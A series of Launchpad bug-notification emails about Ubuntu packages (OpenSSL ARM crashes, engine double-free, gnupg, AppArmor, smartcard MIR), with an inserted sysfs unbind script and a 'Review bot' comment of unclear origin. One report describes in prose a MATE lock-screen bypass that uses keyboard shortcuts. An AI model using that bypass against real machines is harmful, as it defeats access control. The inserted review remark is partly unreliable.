  root@Ubuntu804:/sys/bus/usb/drivers/usbhid# echo -n 1-7:1.1 >unbind

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/288964/+subscriptions
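
The advice in the reply above (use the control file of the driver the device is actually bound to), as an added example that is not part of the original thread. It also shows the form of the write that works with sudo: in `sudo echo ... >unbind` the redirect is opened by the calling unprivileged shell, which is why the report shows "Permission denied". `SYSFS_ROOT`, `PRIV` and the function names are assumptions introduced for this example.

```shell
#!/bin/sh
# Added example, not code from sudo or the kernel.
# SYSFS_ROOT is overridable so the lookup can be exercised on a constructed tree.
SYSFS_ROOT=${SYSFS_ROOT:-/sys}
# PRIV is the privilege wrapper placed in front of the program that opens the
# control file. Set it to the empty string when already running as root.
PRIV=${PRIV-sudo}

# Print the unbind control file of the driver currently bound to USB
# interface or device $1 (for example 1-7:1.0). Fails when nothing is bound.
unbind_path_for() {
    iface=$1
    link="$SYSFS_ROOT/bus/usb/devices/$iface/driver"
    if [ ! -L "$link" ]; then
        echo "no driver bound to $iface" >&2
        return 1
    fi
    # The driver symlink points at .../bus/usb/drivers/<name>.
    driver=$(basename "$(readlink "$link")")
    path="$SYSFS_ROOT/bus/usb/drivers/$driver/unbind"
    if [ ! -e "$path" ]; then
        echo "missing control file $path" >&2
        return 1
    fi
    printf '%s\n' "$path"
}

# Detach interface $1 from whatever driver holds it.
unbind_interface() {
    iface=$1
    path=$(unbind_path_for "$iface") || return 1
    # The privileged tee opens the control file itself, so no redirect to the
    # root-only file is performed by the calling shell.
    printf '%s' "$iface" | $PRIV tee "$path" >/dev/null
}
```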




[Touch-packages] [Bug 1953301] Re: Segfault on AArch64 caused by OpenSSL affecting numerous packages

2021-12-07 Thread Seth Arnold
This comment looks promising
https://github.com/mesonbuild/meson/issues/9690#issuecomment-986872688

It identifies https://github.com/openssl/openssl/pull/13256 and
https://github.com/openssl/openssl/pull/13218 as candidate fixes.

** Bug watch added: github.com/mesonbuild/meson/issues #9690
   https://github.com/mesonbuild/meson/issues/9690

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1953301

Title:
  Segfault on AArch64 caused by OpenSSL affecting numerous packages

Status in openssl package in Ubuntu:
  Incomplete

Bug description:
  OpenSSL causes crashes when reaching to some URLs on AArch64 platform,
  affecting Ubuntu, but not Fedora for instance.

  Initially reported in
  https://mediasoup.discourse.group/t/mediasoup-worker-default-make-failed/3647/12,
  more details and reproductions in
  https://github.com/mesonbuild/meson/issues/9690

  Affects curl, wget, python and probably everything else.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1953301/+subscriptions




[Touch-packages] [Bug 1952548] Re: package libgdk-pixbuf2.0-0:i386 2.40.0+dfsg-3ubuntu0.2 failed to install/upgrade: el paquete está en un estado muy malo e inconsistente - debe reinstalarlo antes de

2021-11-29 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to gdk-pixbuf in Ubuntu.
https://bugs.launchpad.net/bugs/1952548

Title:
  package libgdk-pixbuf2.0-0:i386 2.40.0+dfsg-3ubuntu0.2 failed to
  install/upgrade: el paquete está en un estado muy malo e inconsistente
  - debe reinstalarlo  antes de intentar desinstalarlo.

Status in gdk-pixbuf package in Ubuntu:
  New

Bug description:
  System is in an infinite loop

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: libgdk-pixbuf2.0-0:i386 2.40.0+dfsg-3ubuntu0.2
  ProcVersionSignature: Ubuntu 5.11.0-40.44~20.04.2-generic 5.11.22
  Uname: Linux 5.11.0-40-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.21
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Sun Nov 28 09:15:56 2021
  DpkgTerminalLog:
   dpkg: error al procesar el paquete libgdk-pixbuf2.0-0:i386 (--remove):
    el paquete está en un estado muy malo e inconsistente - debe reinstalarlo
    antes de intentar desinstalarlo.
   dpkg: demasiados errores, parando
  ErrorMessage: el paquete está en un estado muy malo e inconsistente - debe reinstalarlo  antes de intentar desinstalarlo.
  InstallationDate: Installed on 2021-11-19 (8 days ago)
  InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819)
  PackageArchitecture: i386
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: gdk-pixbuf
  Title: package libgdk-pixbuf2.0-0:i386 2.40.0+dfsg-3ubuntu0.2 failed to install/upgrade: el paquete está en un estado muy malo e inconsistente - debe reinstalarlo  antes de intentar desinstalarlo.
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gdk-pixbuf/+bug/1952548/+subscriptions




[Touch-packages] [Bug 1951279] Re: OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

2021-11-18 Thread Seth Arnold
Ah, that's good for the health of your storage :)

Please follow up with the debug symbols and reproduction instructions.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1951279

Title:
  OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

Status in openssl package in Ubuntu:
  Incomplete

Bug description:
  Description
  ---

  It seems that the current Ubuntu 20.04 (Focal) distribution for
  Arm64/Aarch64 raises a segmentation fault when validating some
  certificates.

  This issue affects only Arm64/Aarch64; all the tools statically or
  dynamically linked with this version of the library are affected
  (Libcurl4, Curl, Wget, OpenJDK, Curl-PHP, etc).

  
  Environment and platform
  
  Linux 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:29:20 UTC 2021 aarch64 aarch64 aarch64 GNU/Linux

  
  Steps to reproduce
  --

  1. Run:

  curl -v https://graph.facebook.com/v12.0/act_111/

  or

  wget https://graph.facebook.com/v12.0/act_111/

  
  Result received
  ---

  Segmentation fault (core dumped)

  
  Notes
  -

  This bug was found by the Curl users:
  See: https://github.com/curl/curl/issues/8024

  I believe that this bug is related to
  https://ubuntu.com/security/CVE-2020-1967 that may be used as a vector
  point for code injection.

  Actually there isn't any replacement for OpenSSL 1.1.1f for Focal
  (Arm64), so it makes it difficult to use Ubuntu 20.04 in a production
  environment.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1951279/+subscriptions




[Touch-packages] [Bug 1951279] Re: OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

2021-11-17 Thread Seth Arnold
Hmm, something else to keep in mind: many aarch64 systems run on SD
cards or USB memory sticks and those are notorious garbage.

Is this a reasonable hard drive or is this cheap flash storage? Are
there messages in dmesg that might indicate filesystem or block storage
errors?

If this isn't a real hard drive then your debugging time is probably
better spent replacing the storage as a first effort.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1951279

Title:
  OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

Status in openssl package in Ubuntu:
  Incomplete

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1951279/+subscriptions




[Touch-packages] [Bug 1951279] Re: OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

2021-11-17 Thread Seth Arnold
Can you provide more information on your environment and how to
reproduce this? I wasn't able to reproduce this on my rpi3b+ running
focal, with either libssl1.1 1.1.1f-1ubuntu2.8 or 1.1.1f-1ubuntu2.9:

First, 1.1.1f-1ubuntu2.8 installed:

$ curl -v https://graph.facebook.com/v12.0/act_111/
*   Trying 157.240.3.20:443...
* TCP_NODELAY set
* Connected to graph.facebook.com (157.240.3.20) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/certs/ca-certificates.crt
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_CHACHA20_POLY1305_SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: C=US; ST=California; L=Menlo Park; O=Facebook, Inc.; CN=*.facebook.com
*  start date: Nov  4 00:00:00 2021 GMT
*  expire date: Feb  2 23:59:59 2022 GMT
*  subjectAltName: host "graph.facebook.com" matched cert's "*.facebook.com"
*  issuer: C=US; O=DigiCert Inc; OU=www.digicert.com; CN=DigiCert SHA2 High Assurance Server CA
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0xc4c9dee0)
> GET /v12.0/act_111/ HTTP/2
> Host: graph.facebook.com
> user-agent: curl/7.68.0
> accept: */*
> 
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 403 
< vary: Origin
< x-ad-account-usage: {"acc_id_util_pct":0}
< x-fb-rlafr: 0
< content-type: application/json; charset=UTF-8
< www-authenticate: OAuth "Facebook Platform" "insufficient_scope" "(#200) Provide valid app ID"
< access-control-allow-origin: *
< facebook-api-version: v12.0
< strict-transport-security: max-age=15552000; preload
< pragma: no-cache
< cache-control: no-store
< expires: Sat, 01 Jan 2000 00:00:00 GMT
< x-fb-request-id: AYFxZKGuw4Uidu_b6_RsyRn
< x-fb-trace-id: C1HBc2Oi1S3
< x-fb-rev: 1004746171
< x-fb-debug: yza+SwSrqD6mY1INQSyb5rcHmU89PziSoE3txYwg1BjWybYcgB36mUMVxq9bsRAJXZGkc34nNcSps5APpyG8QA==
< content-length: 125
< date: Wed, 17 Nov 2021 20:48:02 GMT
< alt-svc: h3=":443"; ma=3600, h3-29=":443"; ma=3600
< 
* Connection #0 to host graph.facebook.com left intact
{"error":{"message":"(#200) Provide valid app ID","type":"OAuthException","code":200,"fbtrace_id":"AYFxZKGuw4Uidu_b6_RsyRn"}}
ubuntu@ubuntu:~ $ wget https://graph.facebook.com/v12.0/act_111/
--2021-11-17 20:48:16--  https://graph.facebook.com/v12.0/act_111/
Resolving graph.facebook.com (graph.facebook.com)... 157.240.3.20, 2a03:2880:f001:6:face:b00c:0:2
Connecting to graph.facebook.com (graph.facebook.com)|157.240.3.20|:443... connected.
HTTP request sent, awaiting response... 403 Forbidden
2021-11-17 20:48:16 ERROR 403: Forbidden.

ubuntu@ubuntu:~ 8 $


Next, 1.1.1f-1ubuntu2.9 installed:

ubuntu@ubuntu:~ 10s $ curl -v https://graph.facebook.com/v12.0/act_111/
*   Trying 157.240.3.20:443...
* TCP_NODELAY set
* Connected to graph.facebook.com (157.240.3.20) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/certs/ca-certificates.crt
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_CHACHA20_POLY1305_SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: C=US; ST=California; L=Menlo Park; O=Facebook, Inc.; CN=*.facebook.com
*  start date: Nov  4 00:00:00 2021 GMT
*  expire date: Feb  2 23:59:59 2022 GMT
*  subjectAltName: host "graph.facebook.com" matched cert's "*.facebook.com"
*  issuer: C=US; O=DigiCert Inc; OU=www.digicert.com; CN=DigiCert SHA2 High Assurance Server CA
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0xf7766ee0)
> GET /v12.0/act_111/ HTTP/2
> Host: graph.facebook.com
> user-agent: curl/7.68.0
> accept: */*
> 
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 403 
< 

[Touch-packages] [Bug 1921518] Re: OpenSSL "double free" error

2021-11-15 Thread Seth Arnold
** Attachment added: "archive grep for CONF_modules_load_file"
   https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1921518/+attachment/5541087/+files/openssl-conf-modules-load-file-15-10%3A46%3A37.gz

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to wget in Ubuntu.
https://bugs.launchpad.net/bugs/1921518

Title:
  OpenSSL "double free" error

Status in openssl package in Ubuntu:
  Incomplete
Status in wget package in Ubuntu:
  Fix Released
Status in openssl source package in Focal:
  Incomplete
Status in wget source package in Focal:
  Fix Committed

Bug description:
  [Impact]
  openssl config file is being loaded twice, causing engines to be loaded
  twice if specified therein, causing double free errors and other strange
  behavior.

  [Test plan]
  Run the command of the package being tested in

  gdb  -ex "break CONF_modules_load_file" -ex "run" --args

  and make sure it only breaks once.

  Regression test:

  In default Ubuntu configuration, either no openssl configuration is
  provided, or it contains no settings that affect wget. This code path
  changes how/when openssl configuration is loaded and used by openssl.
  One should verify that:
  1) wget continues to work without openssl.cnf
  2) wget continues to work with stock ubuntu unmodified openssl.cnf
  3) wget continues to honor and use custom TLS settings that one may have
     specified in openssl.cnf (for example custom engine)

  
  [Where problems could occur]

  wget: This is an upstream change that changes initialization and is in
  use in later releases. Since it mostly removes an unneeded call to the
  load file function, a regression could be a config file being ignored,
  but it seems unlikely given the use in later releases

  
  [Original bug report]
  "double free" error is seen when using curl utility. Error is from 
libcrypto.so which is part of the OpenSSL package. This happens only when 
OpenSSL is configured to use a dynamic engine.

  OpenSSL version is 1.1.1f

  The issue is not encountered if
  http://www.openssl.org/source/openssl-1.1.1f.tar.gz is used instead.

  OpenSSL can be configured to use a dynamic engine by editing the
  default openssl config file which is located at '/etc/ssl/openssl.cnf'
  on Ubuntu systems.

  On Bluefield systems, config diff to enable PKA dynamic engine, is as
  below:

  +openssl_conf = conf_section
  +
   # Extra OBJECT IDENTIFIER info:
   #oid_file  = $ENV::HOME/.oid
   oid_section= new_oids

  +[ conf_section ]
  +engines = engine_section
  +
  +[ engine_section ]
  +bf = bf_section
  +
  +[ bf_section ]
  +engine_id=pka
  +dynamic_path=/usr/lib/aarch64-linux-gnu/engines-1.1/pka.so
  +init=0
  +
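
Review bot: the first added line, `openssl_conf = conf_section`, turns the engine section on for every program that reads the default `/etc/ssl/openssl.cnf`, so the engine is loaded into unrelated tools as well as the one under test. For reproducing the double free, consider putting these lines in a copy of the file and pointing only the test process at it with the `OPENSSL_CONF` environment variable. In `[ bf_section ]`, a comment on `init=0` would also help, since it asks OpenSSL not to initialise the engine while the configuration is read, and the section key `bf` does not match `engine_id=pka`.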

  engine_id above refers to dynamic engine name/identifier.
  dynamic_path points to the .so file for the dynamic engine.

  # curl -O https://tpo.pe/pathogen.vim

  double free or corruption (out)

  Aborted (core dumped)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1921518/+subscriptions




[Touch-packages] [Bug 1950201] Re: Gnugpg does not offer the option to store the private and public keys on two different keycards.

2021-11-08 Thread Seth Arnold
This guide describes how to make a copy of gnupg files in order to
create a duplicate card:

https://zach.codes/ultimate-yubikey-setup-guide/

It would be nice if such a guide weren't necessary.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to gnupg in Ubuntu.
https://bugs.launchpad.net/bugs/1950201

Title:
  Gnugpg does not offer the option to store the private and public keys
  on two different keycards.

Status in gnupg package in Ubuntu:
  New

Bug description:
  Gnugpg does not offer the option to store the private and public keys
  on two different keycards.

  I have followed the official yubikey guide as follows, but it might
  apply to similar smart cards and USB tokens:

  To import the key on your YubiKey:

  Insert the YubiKey into the USB port if it is not already plugged
  in.

  Enter the GPG command: gpg --edit-key 1234ABC (where 1234ABC is
  the key ID of your key)

  Enter the command: keytocard

  When prompted if you really want to move your primary key, enter y
  (yes).

  When prompted where to store the key, select 1. This will move the
  signature subkey to the PGP signature slot of the YubiKey.

  Enter the command: key 1
  Enter the command: keytocard

  When prompted where to store the key, select 2. This will move the
  encryption subkey to the YubiKey.

  Enter the command: key 1

  Enter the command: key 2

  Enter the command: keytocard

  When prompted where to store the key, select 3. This will move the
  authentication subkey to the YubiKey.

  Enter the command: quit
  When prompted to save your changes, enter y (yes). You have now saved
  your keyring to your YubiKey.

  The issue with that is that it permanently moves the secret keys to
  the yubikey or similar, and that causes issues later if one wants to
  create backup keys.

  If one saves the changes and tries to make a separate identical key
  card at a later date, one gets the "gpg: KEYTOCARD failed: Unusable
  secret key." error.

  I have read that if one presses control and c (on Linux) after the last
  keytocard and option 3, the secret keys will not be deleted from the
  computer, only copied. One can then start again at this step:
  gpg --edit-key 1234ABC (where 1234ABC is the key ID of your key).
  Another possible but tedious workaround is to back up the secret keys
  and public keys, import those back into gpg, and then move the keys to a
  physical backup key.

  (Note: Key 0 is the primary signature subkey. Key 1 is the encryption
  subkey. Key 2 is the authentication subkey.)

  Ideally, there should be an option in the gpg menu about this, that asks
  about permanently moving the keys.

  A nice addition would be:

  Do you want to make a separate identical key card?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnupg/+bug/1950201/+subscriptions




[Touch-packages] [Bug 1812095] Re: console login loop after entering username followed by RETURN

2021-10-27 Thread Seth Arnold
*** This bug is a duplicate of bug 1813873 ***
https://bugs.launchpad.net/bugs/1813873

daniel-sokolov, this bug was fixed in Ubuntu kernels two and a half
years ago. Do you really have such an old kernel? I suggest asking for
help in Mint support channels -- hopefully someone can walk you through
installing a newer kernel through a rescue system.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1812095

Title:
  console login loop after entering username followed by RETURN

Status in shadow package in Ubuntu:
  Confirmed

Bug description:
   login: 
  password:

  Just do nothing. About two seconds later ...

  login:
  password:

  login:
  password:

  login:
  password:

  After this being displayed three times:

  "Too many failure" or so and login is restarting.

  You can't log in at all. Only solution: clear the password for the
  account you want to log in with.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: login 1:4.5-1ubuntu1
  ProcVersionSignature: Ubuntu 4.18.0-14.15-generic 4.18.20
  Uname: Linux 4.18.0-14-generic x86_64
  ApportVersion: 2.20.10-0ubuntu13.1
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Wed Jan 16 19:34:30 2019
  InstallationDate: Installed on 2011-10-19 (2645 days ago)
  InstallationMedia: Xubuntu 11.10 "Oneiric Ocelot" - Release amd64 (20111012)
  SourcePackage: shadow
  UpgradeStatus: Upgraded to cosmic on 2018-11-03 (74 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1812095/+subscriptions




[Touch-packages] [Bug 1948339] Re: Logon screen can be bypassed using various shortcuts

2021-10-21 Thread Seth Arnold
Your daughter does good work :)

Thanks

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1948339

Title:
  Logon screen can be bypassed using various shortcuts

Status in Ubuntu MATE:
  New
Status in arctica-greeter package in Ubuntu:
  New
Status in lightdm package in Ubuntu:
  New
Status in mate-settings-daemon package in Ubuntu:
  New

Bug description:
  Hi,

  my little daughter discovered a logon screen bypass in Ubuntu Mate
  21.10 after hitting the keyboard for a while.

  It turns out that several keyboard shortcuts are allowed while Ubuntu
  Mate is locked (arctica-greeter):

  - Mod4 + S (mate-search-tool)
  - Mod4 + E (Open Caja / File Explorer)
  - CTRL + Shift + Esc (mate-system-monitor)
  - PRNT (Screenshot)

  All of the mentioned shortcuts could be used to spawn a file explorer
  (Caja) or various other binaries as user "lightdm", who owns the logon
  screen.

  Although an interactive terminal like mate-terminal, xterm, lxterm
  etc. could not be opened directly, there are various options to run
  commands as the lightdm user, for example by creating a shell script
  using "caja", and execute it directly using the GUI.

  I've attached Proof-of-Concept GIFs for all shortcuts mentioned above.
  There might be additional shortcuts that could be used to achieve the
  same, however I'm not aware about every shortcut that is configured,
  but I suppose that the root cause is located somewhere in arctica-
  greeter, rather than within every single binary launched by shortcuts.

  The bug was reproduced on a fresh installation of Ubuntu Mate 21.10. I
  haven't tested other versions of Ubuntu Mate yet.

  Please find additional version details below:

  $ apt-cache policy lightdm

  lightdm:
    Installed: 1.30.0-0ubuntu4
    Candidate: 1.30.0-0ubuntu4
    Version table:
   *** 1.30.0-0ubuntu4 500
          500 http://de.archive.ubuntu.com/ubuntu impish/universe amd64 Packages
          100 /var/lib/dpkg/status

  $ apt-cache policy arctica-greeter

  arctica-greeter:
    Installed: 0.99.1.5-2nmu1
    Candidate: 0.99.1.5-2nmu1
    Version table:
   *** 0.99.1.5-2nmu1 500
          500 http://de.archive.ubuntu.com/ubuntu impish/universe amd64 Packages
          100 /var/lib/dpkg/status

  Thanks,
  Basti

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu-mate/+bug/1948339/+subscriptions




[Touch-packages] [Bug 1947526] Re: can't run associated docker-compose

2021-10-18 Thread Seth Arnold
Hello Andrew, I don't understand what exactly is broken; your logs show
a lot of AppArmor profiles loading without trouble.

What are you trying to do? What's going wrong?

Thanks

** Changed in: apparmor (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1947526

Title:
  can't run associated docker-compose

Status in apparmor package in Ubuntu:
  Incomplete

Bug description:
  I can't seem to get apparmor to run at all, even sudo rm and sudo
  restart in the /etc/init.d/apparmor

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: apparmor 2.13.3-7ubuntu5.1
  ProcVersionSignature: Ubuntu 5.11.0-37.41~20.04.2-generic 5.11.22
  Uname: Linux 5.11.0-37-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.20
  Architecture: amd64
  CasperMD5CheckResult: skip
  CurrentDesktop: ubuntu:GNOME
  Date: Sun Oct 17 17:56:59 2021
  InstallationDate: Installed on 2021-08-31 (47 days ago)
  InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-5.11.0-37-generic root=UUID=ca77035a-d2b3-4803-a4e1-333e95d847fb ro quiet splash
  SourcePackage: apparmor
  Syslog:
   
  UpgradeStatus: No upgrade log present (probably fresh install)
  modified.conffile..etc.apparmor.d.abstractions.mysql: [deleted]
  modified.conffile..etc.apparmor.parser.conf: [deleted]

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1947526/+subscriptions




[Touch-packages] [Bug 1947394] Re: package ca-certificates 20210119ubuntu0.21.04.1 failed to install/upgrade: triggers looping, abandoned

2021-10-15 Thread Seth Arnold
** Package changed: ca-certificates (Ubuntu) => ubuntu-release-upgrader (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1947394

Title:
  package ca-certificates 20210119ubuntu0.21.04.1 failed to
  install/upgrade: triggers looping, abandoned

Status in ubuntu-release-upgrader package in Ubuntu:
  New

Bug description:
  failed on upgrade to 21.10 on machine with AMD GPUs

  ProblemType: Package
  DistroRelease: Ubuntu 21.04
  Package: ca-certificates 20210119ubuntu0.21.04.1
  Uname: Linux 5.11.0-051100-generic x86_64
  ApportVersion: 2.20.11-0ubuntu65.3
  Architecture: amd64
  CasperMD5CheckResult: unknown
  Date: Fri Oct 15 11:24:28 2021
  ErrorMessage: triggers looping, abandoned
  InstallationDate: Installed on 2020-12-18 (301 days ago)
  InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.9, Python 3.9.5, python3-minimal, 3.9.4-1
  PythonDetails: N/A
  RebootRequiredPkgs: Error: path contained symlinks.
  RelatedPackageVersions:
   dpkg 1.20.9ubuntu1
   apt  2.2.4ubuntu0.1
  SourcePackage: ca-certificates
  Title: package ca-certificates 20210119ubuntu0.21.04.1 failed to install/upgrade: triggers looping, abandoned
  UpgradeStatus: Upgraded to hirsute on 2021-10-15 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ubuntu-release-upgrader/+bug/1947394/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1892559] Re: [MIR] ccid opensc pcsc-lite

2021-10-05 Thread Seth Arnold
Now that the security team has some new hires, we're looking at reviving
this series of tasks. Looking through the bug I have come up with the
following outstanding items:

- Add a .symbols file to opensc
- try to add vsmartcard-vpicc + vsmartcard-vpcd autopkgtests
- a formal list of 'supported cards' that we will test with and expect to work
- try to address the awkward path of libraries, /lib/pam_pkcs11/
- make pcscd not run as root https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930530

Did I overlook anything?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pcsc-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1892559

Title:
  [MIR] ccid opensc pcsc-lite

Status in ccid package in Ubuntu:
  New
Status in opensc package in Ubuntu:
  Incomplete
Status in pam-pkcs11 package in Ubuntu:
  Invalid
Status in pcsc-lite package in Ubuntu:
  New
Status in pcsc-perl package in Ubuntu:
  Invalid
Status in pcsc-tools package in Ubuntu:
  Invalid

Bug description:
  ==> ccid <==
  [Availability]
  ccid is in universe, and builds on all architectures.

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  No CVEs for ccid are listed in our database.
  Doesn't appear to bind to a socket.
  No privileged executables, but does have udev rules.
  Probably needs a security review.

  [Quality assurance]
  No test suite.
  Does require odd hardware that we'll probably need to buy.
  I don't see debconf questions.
  ccid is well maintained in Debian by upstream author.
  One open wishlist bug in BTS, harmless.

  One open bug in launchpad, not security, but looks very frustrating
  for the users. The upstream author was engaged but it never reached
  resolution.  https://bugs.launchpad.net/ubuntu/+source/ccid/+bug/1175465

  Has a debian/watch file.
  Quilt packaging.

  P: ccid source: no-dep5-copyright
  P: ccid source: package-uses-experimental-debhelper-compat-version 13

  [Dependencies]
  Minimal dependencies, in main

  [Standards compliance]
  Appears to satisfy FHS and Debian policy

  [Maintenance]
  The desktop team will subscribe to bugs, however it is expected that the
  security team will assist with security-relevant questions.

  [Background information]
  ccid provides drivers to interact with usb-connected smart card readers.

  ==> libpam-pkcs11 <==
  [Availability]
  Source package pam-pkcs11 is in universe and builds on all architectures.

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  No CVEs in our database.
  Doesn't appear to bind to sockets.
  No privileged executables (but is a PAM module).
  As a PAM module this will require a security review.

  [Quality assurance]
  The package does not call pam-auth-update in its postinst #1650366
  Does not ask questions during install.
  One Ubuntu bug claims very poor behaviour if a card isn't plugged in.
  No Debian bugs.
  Occasional updates in Debian by long-term maintainer.
  Does require odd hardware that we'll probably need to buy.
  Does not appear to run tests during build.
  Has scary warnings in the build logs.
  Has a debian/watch file.

  Ancient standards version; other smaller lintian messages, mostly
  documentation problems.

  Quilt packaging.

  [Dependencies]
  Depends on libcurl4, libldap-2.4-2, libpam0g, libpcsclite1, libssl1.1
  All are in main.

  [Standards compliance]
  The package does not call pam-auth-update in its postinst #1650366
  Otherwise looks to conform to FHS and Debian policies

  [Maintenance]
  The desktop team will subscribe to bugs, however it is expected that the
  security team will assist with security-relevant questions.

  [Background information]
  This PAM module can use CRLs and full-chain verification of certificates.
  It can also do LDAP, AD, and Kerberos username mapping.

  ==> libpcsc-perl <==
  [Availability]
  Source package pcsc-perl is in universe, builds for all architectures,
  plus i386

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  There are no CVEs for pcsc-perl in our database.
  No privileged executables.
  Doesn't appear to bind to sockets.
  Probably needs a security review.

  [Quality assurance]
  Library package not intended to be used directly.
  No debconf questions.
  No bugs in Debian.
  No bugs in Ubuntu.
  Does require odd hardware that we'll probably need to buy.
  Tests exist, not run during the build; probably can't run during the build.
